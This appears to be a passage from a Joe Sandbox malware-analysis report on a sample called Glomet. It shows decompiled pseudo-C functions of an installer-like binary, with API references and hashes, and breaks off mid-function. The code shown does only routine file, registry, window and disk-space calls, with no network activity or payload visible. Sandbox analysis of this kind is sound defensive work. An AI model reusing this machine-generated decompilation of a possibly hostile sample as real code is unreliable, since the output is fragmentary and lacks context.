                                                                                                                                                                              • API ID: PrivateProfileStringWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 390214022-0
                                                                                                                                                                              • Opcode ID: d626627cbd6b652d474c84542a43e6e56583ab8881f8c4b4047e74021ad6b779
                                                                                                                                                                              • Instruction ID: 283275a52edd010614121f365ad7e92e903c30a389c438d95b9ec19b8cf14ce9
                                                                                                                                                                              • Opcode Fuzzy Hash: d626627cbd6b652d474c84542a43e6e56583ab8881f8c4b4047e74021ad6b779
                                                                                                                                                                              • Instruction Fuzzy Hash: 25E09B31604269ABE7203EF15E8E9BF22A4DB80314B25053BFA41B61C2D9FC4C4347AD
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                              			E00402733(intOrPtr __edx, void* __eflags) {
                                                                                                                                                                              				long _t7;
                                                                                                                                                                              				long _t9;
                                                                                                                                                                              				LONG* _t11;
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                              				void* _t17;
                                                                                                                                                                              				void* _t19;
                                                                                                                                                                              
                                                                                                                                                                              				_t14 = __edx;
                                                                                                                                                                              				_push(ds);
                                                                                                                                                                              				if(__eflags != 0) {
                                                                                                                                                                              					_t7 = E00402C17(2);
                                                                                                                                                                              					_pop(_t13);
                                                                                                                                                                              					 *((intOrPtr*)(_t19 - 0x38)) = _t14;
                                                                                                                                                                              					_t9 = SetFilePointer(E004061CE(_t13, _t17), _t7, _t11,  *(_t19 - 0x1c)); // executed
                                                                                                                                                                              					if( *((intOrPtr*)(_t19 - 0x24)) >= _t11) {
                                                                                                                                                                              						_push(_t9);
                                                                                                                                                                              						E004061B5();
                                                                                                                                                                              					}
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t19 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}











                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402751
                                                                                                                                                                                • Part of subcall function 004061B5: wsprintfA.USER32 ref: 004061C2
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePointerwsprintf
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 327478801-0
                                                                                                                                                                              • Opcode ID: 4ca417089e649987262dda3cab944978d0a97590f239ea9c21da6aeac4edae52
                                                                                                                                                                              • Instruction ID: a132023e33ce3b2274f2a3cc1c924ae45bed6fe67fe9b9d7ffa32cf729765a6a
                                                                                                                                                                              • Opcode Fuzzy Hash: 4ca417089e649987262dda3cab944978d0a97590f239ea9c21da6aeac4edae52
                                                                                                                                                                              • Instruction Fuzzy Hash: B1E09271A00104BED710EB94AE89CAE7778DB84314B64043BF102F50C1DA7848518A3D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040610B(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                                                                                                                                              				void* _t7;
                                                                                                                                                                              				long _t8;
                                                                                                                                                                              				void* _t9;
                                                                                                                                                                              
                                                                                                                                                                              				_t7 = E0040605C(_a4,  &_a12);
                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                              					_t8 = RegCreateKeyExA(_t7, _a8, 0, 0, 0, _a12, 0, _a16, 0); // executed
                                                                                                                                                                              					return _t8;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t9 = 6;
                                                                                                                                                                              				return _t9;
                                                                                                                                                                              			}







                                                                                                                                                                              APIs
                                                                                                                                                                              • RegCreateKeyExA.KERNELBASE(00000000,?,00000000,00000000,00000000,?,00000000,?,00000000,?,?,?,00402CEA,00000000,?,?), ref: 00406134
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Create
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2289755597-0
                                                                                                                                                                              • Opcode ID: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                              • Instruction ID: f3dc4abaab06895e066b0b710936ca54da7b1f8b7a25aa4512e4b4def2a222e8
                                                                                                                                                                              • Opcode Fuzzy Hash: f0170b29b94a961cdf0cc122a920c286c7e5b726b195fdee8f598fb45efbb6e4
                                                                                                                                                                              • Instruction Fuzzy Hash: BAE0E672110209BEEF195F50DC0AD7B371DEB14314F01452EF947D4091E6B5A9305634
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040171F() {
                                                                                                                                                                              				long _t5;
                                                                                                                                                                              				CHAR* _t8;
                                                                                                                                                                              				CHAR* _t12;
                                                                                                                                                                              				void* _t14;
                                                                                                                                                                              				long _t17;
                                                                                                                                                                              
                                                                                                                                                                              				_t5 = SearchPathA(_t8, E00402C39(0xffffffff), _t8, 0x400, _t12, _t14 + 8); // executed
                                                                                                                                                                              				_t17 = _t5;
                                                                                                                                                                              				if(_t17 == 0) {
                                                                                                                                                                              					 *((intOrPtr*)(_t14 - 4)) = 1;
                                                                                                                                                                              					 *_t12 = _t8;
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t14 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}









                                                                                                                                                                              APIs
                                                                                                                                                                              • SearchPathA.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401733
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: PathSearch
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2203818243-0
                                                                                                                                                                              • Opcode ID: 374c22ba7daa04feaf9921462dea6aa1bbd67497b7e3e3c267911b64cd111e0b
                                                                                                                                                                              • Instruction ID: ca2d9b39537dad7175a5f2bb677baa4b1f6d657c0aa67d91cc455ca62d690c78
                                                                                                                                                                              • Opcode Fuzzy Hash: 374c22ba7daa04feaf9921462dea6aa1bbd67497b7e3e3c267911b64cd111e0b
                                                                                                                                                                              • Instruction Fuzzy Hash: 89E0DF72304200ABE720CF649E49EAB37A8CB50368B30453AB201B60C1E6B899058A3D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405E62(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                              				int _t7;
                                                                                                                                                                              				long _t11;
                                                                                                                                                                              
                                                                                                                                                                              				_t11 = _a12;
                                                                                                                                                                              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					return 1;
                                                                                                                                                                              				}
                                                                                                                                                                              			}






                                                                                                                                                                              APIs
                                                                                                                                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403368,00000000,00000000,00403192,000000FF,00000004,00000000,00000000,00000000), ref: 00405E76
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileRead
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2738559852-0
                                                                                                                                                                              • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                                                              • Instruction ID: d159feaa40f66387c232a0365126d803d89e879c5a9a8176c13ce5bb2f202f1c
                                                                                                                                                                              • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                                                                                                                              • Instruction Fuzzy Hash: CFE0B63221025AAFDF109F95DC00AAB7B6CEB05260F144437FD99E6150D671E961DAE4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00405E91(void* _a4, void* _a8, long _a12) {
                                                                                                                                                                              				int _t7;
                                                                                                                                                                              				long _t11;
                                                                                                                                                                              
                                                                                                                                                                              				_t11 = _a12;
                                                                                                                                                                              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                                                                                                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                                                                                                                                              					return 0;
                                                                                                                                                                              				} else {
                                                                                                                                                                              					return 1;
                                                                                                                                                                              				}
                                                                                                                                                                              			}






                                                                                                                                                                              APIs
                                                                                                                                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040331E,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405EA5
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FileWrite
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3934441357-0
                                                                                                                                                                              • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                              • Instruction ID: f6dbd1b2bb29cf3778f9da1b12eb4ab865b2d476cff05d6c6da3e568d4bed244
                                                                                                                                                                              • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                                                                                                                              • Instruction Fuzzy Hash: CEE0EC3221165AABEF119F65DC00AEB7B6CEB05361F004836FA95E3150D631E9219BE4
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004060DD(void* __eflags, intOrPtr _a4, char* _a8, int _a12, void** _a16) {
                                                                                                                                                                              				void* _t7;
                                                                                                                                                                              				long _t8;
                                                                                                                                                                              				void* _t9;
                                                                                                                                                                              
                                                                                                                                                                              				_t7 = E0040605C(_a4,  &_a12);
                                                                                                                                                                              				if(_t7 != 0) {
                                                                                                                                                                              					_t8 = RegOpenKeyExA(_t7, _a8, 0, _a12, _a16); // executed
                                                                                                                                                                              					return _t8;
                                                                                                                                                                              				}
                                                                                                                                                                              				_t9 = 6;
                                                                                                                                                                              				return _t9;
                                                                                                                                                                              			}







                                                                                                                                                                              APIs
                                                                                                                                                                              • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040616B,?,?,?,?,00000002,ExecToStack), ref: 00406101
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Open
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 71445658-0
                                                                                                                                                                              • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                              • Instruction ID: acfb9daac442d6471bee54970dc50a73ebaac4160da87f0822be439bec8b4f66
                                                                                                                                                                              • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                                                                                                                              • Instruction Fuzzy Hash: 01D0123204020DFBEF119F90DD05FAB3B1DAB08310F014426FE06A4091D776D530A724
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040159D() {
                                                                                                                                                                              				int _t5;
                                                                                                                                                                              				void* _t11;
                                                                                                                                                                              				int _t14;
                                                                                                                                                                              
                                                                                                                                                                              				_t5 = SetFileAttributesA(E00402C39(0xfffffff0),  *(_t11 - 0x24)); // executed
                                                                                                                                                                              				_t14 = _t5;
                                                                                                                                                                              				if(_t14 == 0) {
                                                                                                                                                                              					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                                                                                                                                              				}
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t11 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}







                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFileAttributesA.KERNELBASE(00000000,?,000000F0), ref: 004015A8
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: AttributesFile
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3188754299-0
                                                                                                                                                                              • Opcode ID: 8a8d232dc36d4cf2eee60f63c8ed0e02b6e288e44aa08648e51248d7e12fb2c9
                                                                                                                                                                              • Instruction ID: 3f52c4b603ccfc74cdbb6123baa79f9a690194c4a4ff03e8c12993d7e598b390
                                                                                                                                                                              • Opcode Fuzzy Hash: 8a8d232dc36d4cf2eee60f63c8ed0e02b6e288e44aa08648e51248d7e12fb2c9
                                                                                                                                                                              • Instruction Fuzzy Hash: D8D01232B14104DBDB10DFA5AB0899E73B4DB54324B708577E101F21D1D6B999455B3D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00404320(int _a4) {
                                                                                                                                                                              				struct HWND__* _t2;
                                                                                                                                                                              				long _t3;
                                                                                                                                                                              
                                                                                                                                                                              				_t2 =  *0x42ebf8; // 0x5001c
                                                                                                                                                                              				if(_t2 != 0) {
                                                                                                                                                                              					_t3 = SendMessageA(_t2, _a4, 0, 0); // executed
                                                                                                                                                                              					return _t3;
                                                                                                                                                                              				}
                                                                                                                                                                              				return _t2;
                                                                                                                                                                              			}






                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageA.USER32(0005001C,00000000,00000000,00000000), ref: 00404332
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                                                                                                                              • Instruction ID: 5c6e1af33eb05755d943f79c15c7bc1e123e6569ffc521d05fa768bf99fbbdf6
                                                                                                                                                                              • Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                                                                                                                              • Instruction Fuzzy Hash: E9C09B717447017FEE20DB619D45F0777986760701F2544397751F60D0C674E410D61C
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E0040336B(long _a4) {
                                                                                                                                                                              				long _t2;
                                                                                                                                                                              
                                                                                                                                                                              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                                                                                                                                              				return _t2;
                                                                                                                                                                              			}




                                                                                                                                                                              0x00403379
                                                                                                                                                                              0x0040337f

                                                                                                                                                                              APIs
                                                                                                                                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: FilePointer
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 973152223-0
                                                                                                                                                                              • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                              • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                                                                                                                              • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                                                                                                                              • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E00404309(int _a4) {
                                                                                                                                                                              				long _t2;
                                                                                                                                                                              
                                                                                                                                                                              				_t2 = SendMessageA( *0x42f428, 0x28, _a4, 1); // executed
                                                                                                                                                                              				return _t2;
                                                                                                                                                                              			}




                                                                                                                                                                              0x00404317
                                                                                                                                                                              0x0040431d

                                                                                                                                                                              APIs
                                                                                                                                                                              • SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: MessageSend
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3850602802-0
                                                                                                                                                                              • Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                                                                                                                              • Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
                                                                                                                                                                              • Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                                                                                                                              • Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004042F6(int _a4) {
                                                                                                                                                                              				int _t2;
                                                                                                                                                                              
                                                                                                                                                                              				_t2 = EnableWindow( *0x42a88c, _a4); // executed
                                                                                                                                                                              				return _t2;
                                                                                                                                                                              			}




                                                                                                                                                                              0x00404300
                                                                                                                                                                              0x00404306

                                                                                                                                                                              APIs
                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: CallbackDispatcherUser
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 2492992576-0
                                                                                                                                                                              • Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                                                                                                                              • Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
                                                                                                                                                                              • Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                                                                                                                              • Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                              			E004014D6(intOrPtr __edx) {
                                                                                                                                                                              				long _t3;
                                                                                                                                                                              				void* _t7;
                                                                                                                                                                              				intOrPtr _t10;
                                                                                                                                                                              				void* _t13;
                                                                                                                                                                              
                                                                                                                                                                              				_t10 = __edx;
                                                                                                                                                                              				_t3 = E00402C17(_t7);
                                                                                                                                                                              				 *((intOrPtr*)(_t13 - 0x38)) = _t10;
                                                                                                                                                                              				if(_t3 <= 1) {
                                                                                                                                                                              					_t3 = 1;
                                                                                                                                                                              				}
                                                                                                                                                                              				Sleep(_t3); // executed
                                                                                                                                                                              				 *0x42f4a8 =  *0x42f4a8 +  *((intOrPtr*)(_t13 - 4));
                                                                                                                                                                              				return 0;
                                                                                                                                                                              			}








                                                                                                                                                                              APIs
                                                                                                                                                                              • Sleep.KERNELBASE(00000000), ref: 004014E9
                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                              • Source File: 0000001D.00000002.575890944.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                              • Associated: 0000001D.00000002.575844664.0000000000400000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576063119.0000000000408000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.576133488.000000000040A000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577041699.000000000042C000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577174379.0000000000431000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577257988.0000000000435000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577403934.0000000000446000.00000004.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              • Associated: 0000001D.00000002.577502312.0000000000448000.00000002.00000001.01000000.0000000C.sdmp
                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                              • Snapshot File: hcaresult_29_2_400000_Glomet.jbxd
                                                                                                                                                                              Similarity
                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                              • String ID:
                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                              • Opcode ID: 1d33ffbc25aaf2ebbf39683be70fa05d8c52ad4b1d45b29da54ee2863c787776
                                                                                                                                                                              • Instruction ID: 9aaf8c51293fb81f521207d39297afd3f683353c1a64f3bbb741c4b190f6354d
                                                                                                                                                                              • Opcode Fuzzy Hash: 1d33ffbc25aaf2ebbf39683be70fa05d8c52ad4b1d45b29da54ee2863c787776
                                                                                                                                                                              • Instruction Fuzzy Hash: F3D05E73B241009BD720EBB8BAC585F73A8E7903253708837E102F2091EA78C8464A38
                                                                                                                                                                              Uniqueness

                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                              C-Code - Quality: 78%
                                                                                                                                                                              			E00404766(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                              				signed int _v12;
                                                                                                                                                                              				long _v16;
                                                                                                                                                                              				long _v20;
                                                                                                                                                                              				long _v24;
                                                                                                                                                                              				char _v28;
                                                                                                                                                                              				intOrPtr _v32;
                                                                                                                                                                              				long _v36;
                                                                                                                                                                              				char _v40;
                                                                                                                                                                              				unsigned int _v44;
                                                                                                                                                                              				signed int _v48;
                                                                                                                                                                              				CHAR* _v56;
                                                                                                                                                                              				intOrPtr _v60;
                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                              				intOrPtr _v68;
                                                                                                                                                                              				CHAR* _v72;
                                                                                                                                                                              				void _v76;
                                                                                                                                                                              				struct HWND__* _v80;
                                                                                                                                                                              				void* __ebx;
                                                                                                                                                                              				void* __edi;
                                                                                                                                                                              				void* __esi;
                                                                                                                                                                              				intOrPtr _t82;
                                                                                                                                                                              				long _t87;
                                                                                                                                                                              				signed char* _t89;
                                                                                                                                                                              				void* _t95;
                                                                                                                                                                              				signed int _t96;
                                                                                                                                                                              				int _t109;
                                                                                                                                                                              				signed char _t114;
                                                                                                                                                                              				signed int _t118;
                                                                                                                                                                              				struct HWND__** _t122;
                                                                                                                                                                              				intOrPtr* _t138;
                                                                                                                                                                              				CHAR* _t146;
                                                                                                                                                                              				intOrPtr _t147;
                                                                                                                                                                              				unsigned int _t150;
                                                                                                                                                                              				signed int _t152;
                                                                                                                                                                              				unsigned int _t156;
                                                                                                                                                                              				signed int _t158;
                                                                                                                                                                              				signed int* _t159;
                                                                                                                                                                              				signed char* _t160;
                                                                                                                                                                              				struct HWND__* _t165;
                                                                                                                                                                              				struct HWND__* _t166;
                                                                                                                                                                              				int _t168;
                                                                                                                                                                              				unsigned int _t197;
                                                                                                                                                                              				void* _t205;
                                                                                                                                                                              
                                                                                                                                                                              				_t156 = __edx;
                                                                                                                                                                              				_t82 =  *0x42a068; // 0x59dddc
                                                                                                                                                                              				_v32 = _t82;
                                                                                                                                                                              				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x430000;
                                                                                                                                                                              				_v12 =  *((intOrPtr*)(_t82 + 0x38));
                                                                                                                                                                              				if(_a8 == 0x40b) {
                                                                                                                                                                              					E00405951(0x3fb, _t146);
                                                                                                                                                                              					E00406535(_t146);
                                                                                                                                                                              				}
                                                                                                                                                                              				_t166 = _a4;
                                                                                                                                                                              				if(_a8 != 0x110) {
                                                                                                                                                                              					L8:
                                                                                                                                                                              					if(_a8 != 0x111) {
                                                                                                                                                                              						L20:
                                                                                                                                                                              						if(_a8 == 0x40f) {
                                                                                                                                                                              							L22:
                                                                                                                                                                              							_v8 = _v8 & 0x00000000;
                                                                                                                                                                              							_v12 = _v12 & 0x00000000;
                                                                                                                                                                              							E00405951(0x3fb, _t146);
                                                                                                                                                                              							if(E00405CD7(_t185, _t146) == 0) {
                                                                                                                                                                              								_v8 = 1;
                                                                                                                                                                              							}
                                                                                                                                                                              							E00406257(0x429860, _t146);
                                                                                                                                                                              							_t87 = E00406663(1);
                                                                                                                                                                              							_v16 = _t87;
                                                                                                                                                                              							if(_t87 == 0) {
                                                                                                                                                                              								L30:
                                                                                                                                                                              								E00406257(0x429860, _t146);
                                                                                                                                                                              								_t89 = E00405C82(0x429860);
                                                                                                                                                                              								_t158 = 0;
                                                                                                                                                                              								if(_t89 != 0) {
                                                                                                                                                                              									 *_t89 =  *_t89 & 0x00000000;
                                                                                                                                                                              								}
                                                                                                                                                                              								if(GetDiskFreeSpaceA(0x429860,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
                                                                                                                                                                              									goto L35;
                                                                                                                                                                              								} else {
                                                                                                                                                                              									_t168 = 0x400;
                                                                                                                                                                              									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
                                                                                                                                                                              									asm("cdq");
                                                                                                                                                                              									_v48 = _t109;
                                                                                                                                                                              									_v44 = _t156;
                                                                                                                                                                              									_v12 = 1;
